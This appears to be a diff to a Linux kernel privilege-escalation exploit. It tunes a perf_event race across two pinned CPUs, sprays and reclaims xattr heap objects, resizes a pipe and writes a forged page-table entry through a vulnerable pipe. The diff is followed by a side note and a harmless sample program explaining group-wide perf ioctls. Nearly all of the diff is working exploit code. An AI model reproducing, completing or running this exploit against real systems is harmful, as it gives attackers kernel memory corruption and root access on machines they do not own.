@@ -285,6 +285,7 @@ void print_proc_self_maps_raw() {
     close(fd);
 }
 
+int counter_init = 0;
 void race(int group_leader) { // caller must have ownership of the group
     int pipefd[2];
     uint64_t buf[0x2000] = {0, };
@@ -299,33 +300,39 @@ void race(int group_leader) { // caller must have ownership of the group
         perror("reclaim failed");
         exit(EXIT_FAILURE);
     }
+
     pid_t child_pid = fork();
     if (child_pid == 0) { // child read
         _pin_to_cpu(CPU_A);
         sched_yield();
         DEBUG_PRINT();
         raise(SIGSTOP); // stop - keep same generation
         for (int i = 0; i < 512 + 511; i++){
-            ioctl(siblings[i], PERF_EVENT_IOC_RESET, 0);
+            ioctl(siblings[i], PERF_EVENT_IOC_RESET, PERF_IOC_FLAG_GROUP);
             ioctl(siblings[i], PERF_EVENT_IOC_ENABLE, 0);
         }
         if (close(siblings[100]) < 0) {
             perror("close failed");
             exit(EXIT_FAILURE);
+        }
+        char *addr;
+        if (!counter_init) { // preserving previously recorded counters.
+            puts("[+] Initializing Counters");
+            addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+            for (int i = 0; i < 0x80; i++){
+                ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0);
+                addr[0x1000 * i] = 0x41;
+                ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0);
+            }
         }
-        ioctl(group_leader, PERF_EVENT_IOC_RESET, 0);
-
-        char *addr = (char *)mmap(NULL, 0x1000 * 0x80, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
-        for (int i = 0; i < 0x80; i++){
-            ioctl(group_leader, PERF_EVENT_IOC_ENABLE, 0);
-            addr[0x1000 * i] = 0x41;
-            ioctl(group_leader, PERF_EVENT_IOC_DISABLE, 0);
-        }
+
         write(pipefd[1], buffer, 1); // sync point A
         remove_xattr("security.x12296_10", 1);
+        // x10 reclaimed by CPU_B is now released on CPU_A
         for (int _ = 0; _ < 1; _++) {
             read(group_leader, buf, sizeof(buf));
         }
+        sched_yield();
         remove_xattr("security.ssiphim", 1);
         if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
             perror("reclaim failed");
@@ -334,7 +341,9 @@ void race(int group_leader) { // caller must have ownership of the group
         uint64_t pte = 0x8000000000000067;
         write(vuln_pipe[1], &pte, 8);
         read(vuln_pipe[0], &pte, 8);
-        munmap(addr, 0x1000 * 0x80);
+        if (!counter_init) {
+            munmap(addr, 0x1000 * 0x80);
+        }
         exit(0);
     }
     else if (child_pid > 0) { // parent
@@ -377,6 +386,8 @@ void race(int group_leader) { // caller must have ownership of the group
         }
         // DEBUGDEBUG - not
         waitpid(child_pid, &status, 0);
+        if (!counter_init)
+            counter_init = 1;
 
         close(pipefd[0]);
         close(pipefd[1]);
@@ -451,14 +462,21 @@ pid_t add_siblings_fork(int group_leader, int cnt, int ctx_pid, int is_racer){
         exit(EXIT_FAILURE);
     }
     if (is_racer) {
+        _pin_to_cpu(CPU_B);
+        sched_yield();
+        // Minimizing heap noise.
+        // child will be running on CPU_A
         spray_xattr_page(0x3008, 12, 1); // 12296
         spray_xattr_page(0x4008, 2, 1); // 16392
         remove_xattr("security.x16392_0", 1);
         remove_xattr("security.x16392_1", 1);
         remove_xattr("security.x12296_5", 1);
         remove_xattr("security.x12296_6", 1);
+        sched_yield();
+        // this reclaim process must be atomic
         remove_xattr("security.x12296_11", 1);
        resize_pipe(vuln_pipe[1], 0x1000 * 220);
+        sched_yield();
         remove_xattr("security.x12296_10", 1);
         remove_xattr("security.x12296_7", 1);
         if (setxattr("/tmp/x1", "security.x12296_10", buf, 0x3008, 0) < 0) {
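Side note on the ioctl change in the child: passing PERF_IOC_FLAG_GROUP instead of 0 makes PERF_EVENT_IOC_RESET (and ENABLE/DISABLE) apply to every event in the perf group rather than only to the fd the ioctl is issued on, so the leader and all siblings end up in a consistent state before the later read on the group leader. What follows is a minimal standalone sketch of that group semantics only, not this commit's event configuration: the perf_open() helper, the choice of two hardware counters, and the PERF_FORMAT_GROUP read layout are illustrative assumptions drawn from the perf_event_open(2) conventions.

/* Sketch: group-wide reset/enable via PERF_IOC_FLAG_GROUP, then one
 * PERF_FORMAT_GROUP read on the leader returning all members' counts. */
#include <linux/perf_event.h>
#include <asm/unistd.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdint.h>

static int perf_open(struct perf_event_attr *attr, int group_fd) {
    /* perf_event_open has no glibc wrapper; invoke the raw syscall. */
    return (int)syscall(__NR_perf_event_open, attr, 0 /* this task */,
                        -1 /* any cpu */, group_fd, 0);
}

int main(void) {
    struct perf_event_attr attr;
    memset(&attr, 0, sizeof(attr));
    attr.size = sizeof(attr);
    attr.type = PERF_TYPE_HARDWARE;
    attr.config = PERF_COUNT_HW_INSTRUCTIONS;  /* leader: retired instructions */
    attr.disabled = 1;                         /* start stopped; enable the group later */
    attr.exclude_kernel = 1;
    attr.exclude_hv = 1;
    attr.read_format = PERF_FORMAT_GROUP | PERF_FORMAT_ID;

    int leader = perf_open(&attr, -1);
    if (leader < 0) { perror("perf_event_open(leader)"); return 1; }

    attr.config = PERF_COUNT_HW_CPU_CYCLES;    /* sibling: CPU cycles */
    attr.disabled = 0;                         /* siblings follow the leader's state */
    int sibling = perf_open(&attr, leader);
    if (sibling < 0) { perror("perf_event_open(sibling)"); return 1; }

    /* With PERF_IOC_FLAG_GROUP the ioctl acts on every member of the group. */
    ioctl(leader, PERF_EVENT_IOC_RESET,  PERF_IOC_FLAG_GROUP);
    ioctl(leader, PERF_EVENT_IOC_ENABLE, PERF_IOC_FLAG_GROUP);

    for (volatile int i = 0; i < 1000000; i++) ;  /* something to count */

    ioctl(leader, PERF_EVENT_IOC_DISABLE, PERF_IOC_FLAG_GROUP);

    /* PERF_FORMAT_GROUP | PERF_FORMAT_ID layout:
     * u64 nr; then { u64 value; u64 id; } for each of the nr events. */
    uint64_t buf[1 + 2 * 2];
    if (read(leader, buf, sizeof(buf)) < 0) { perror("read"); return 1; }
    for (uint64_t i = 0; i < buf[0]; i++)
        printf("event %llu: value=%llu id=%llu\n",
               (unsigned long long)i,
               (unsigned long long)buf[1 + 2 * i],
               (unsigned long long)buf[2 + 2 * i]);
    return 0;
}

The design point this illustrates: when a single read() on the group leader is expected to report the whole group (as the read(group_leader, buf, sizeof(buf)) over the 512 + 511 siblings in the hunk above presumably does), resetting with PERF_IOC_FLAG_GROUP avoids leaving any member with a stale count from an earlier run.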